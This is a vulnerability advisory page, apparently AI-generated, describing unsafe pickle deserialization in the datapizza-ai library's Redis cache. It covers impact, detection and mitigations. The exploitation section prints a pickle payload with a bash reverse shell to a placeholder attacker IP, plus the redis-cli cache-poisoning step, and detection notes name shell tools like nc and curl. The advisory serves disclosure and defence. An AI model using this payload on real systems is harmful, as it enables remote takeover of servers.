
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-2970 is an unsafe deserialization vulnerability in the RedisCache function of the datapizza-ai Python library (version 0.0.2/0.0.7), located in datapizza-ai-cache/redis/datapizza/cache/redis/cache.py. The flaw allows an adjacent-network attacker to achieve remote code execution by poisoning the Redis cache with a malicious serialized payload. It was publicly disclosed on February 23, 2026, with a proof-of-concept published by Hacktive Security researcher Edoardo Ottavianelli. The vendor was contacted prior to disclosure but did not respond. It carries a CVSS v3.1 base score of 7.5 (High) (Feedly, PoC Disclosure).
The root cause is the use of Python's pickle.loads() to deserialize data retrieved directly from Redis without any integrity or type validation (CWE-502: Deserialization of Untrusted Data; CWE-20: Improper Input Validation). The RedisCache.get() method calls pickle.loads(pickled_obj) on whatever bytes are stored in Redis, meaning any attacker who can write to the Redis instance can inject a crafted pickle payload that executes arbitrary OS commands upon deserialization. Exploitation requires adjacent network access to the Redis server (typically unauthenticated by default) and the ability to set a key with a malicious pickle payload — for example, using redis-cli SET <key> <pickle_bytes>. A public PoC demonstrates triggering os.system() via a custom __reduce__ method in a malicious class (PoC Disclosure).
Successful exploitation grants the attacker arbitrary command execution on the server hosting the datapizza-ai application, running as the process's service account with no privilege restrictions. Beyond direct RCE, attackers can subvert AI model behavior by injecting fake outputs into cached queries, exfiltrate sensitive data, deploy reverse shells for persistent access, or pivot laterally within the internal network. Confidentiality, integrity, and availability are all fully compromised upon successful exploitation (PoC Disclosure, Feedly).
A public proof-of-concept exploit is available on GitHub, published by Hacktive Security, and the vulnerability is also listed on VulDB. Exploitation has been demonstrated and reported by undercodetesting.com, which documented a critical RCE chain combining SSTI and unsafe deserialization in datapizza-ai pipelines. The EPSS score is approximately 0.031% (low probability of broad automated exploitation), and the vulnerability does not appear in the CISA KEV catalog as of the time of this report. No patch has been released by the vendor (PoC Disclosure, Feedly, RCE Chain Report).
datapizza-ai (version 0.0.2 or 0.0.7) with an accessible Redis instance, typically listening on port 6379 with no authentication.redis-cli or a Redis client library from the adjacent network (e.g., redis-cli -h <target-ip> -p 6379).__reduce__ method that executes an OS command:import pickle, os
class Evil:
def __reduce__(self):
return (os.system, ("bash -i >& /dev/tcp/<attacker-ip>/4444 0>&1",))
payload = pickle.dumps(Evil())127.0.0.1:6379> SET <cache_key> <pickle_bytes>RedisCache.get(<cache_key>), which invokes pickle.loads() on the poisoned value, executing the embedded OS command on the server.cachepwned as demonstrated in the PoC); new scripts, cron jobs, or SSH authorized keys added by the application service account.SET commands for keys not written by the legitimate application; application logs showing errors or unexpected output from pickle.loads() calls.bash, sh, curl, wget, nc); reverse shell connections originating from the datapizza-ai process (PoC Disclosure).No vendor patch is currently available, as the vendor did not respond to the responsible disclosure. As immediate mitigations: (1) restrict Redis access using firewall rules or network segmentation so only trusted application hosts can connect on port 6379; (2) enable Redis authentication (requirepass) to prevent unauthorized writes; (3) consider replacing pickle with a safe serialization format such as json or msgpack if modifying the library locally; (4) monitor Redis for unexpected key writes and audit all data stored in the cache. Organizations should evaluate whether continued use of datapizza-ai is acceptable given the unpatched state and available public exploit (Feedly, PoC Disclosure).
Hacktive Security published a detailed blog post on February 25, 2026, titled "datapizza-ai: Yet Another Vulnerable AI Framework," framing the disclosure within a broader concern about security practices in AI/ML libraries. The undercodetesting.com blog highlighted the vulnerability as part of a critical RCE chain combining SSTI and unsafe deserialization, emphasizing risks to AI pipelines. The disclosure was picked up by multiple vulnerability aggregators including VulDB, CIRCL, and INCIBE-CERT, reflecting moderate community interest. No official vendor statement has been issued (Hacktive Security Blog, RCE Chain Report).
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."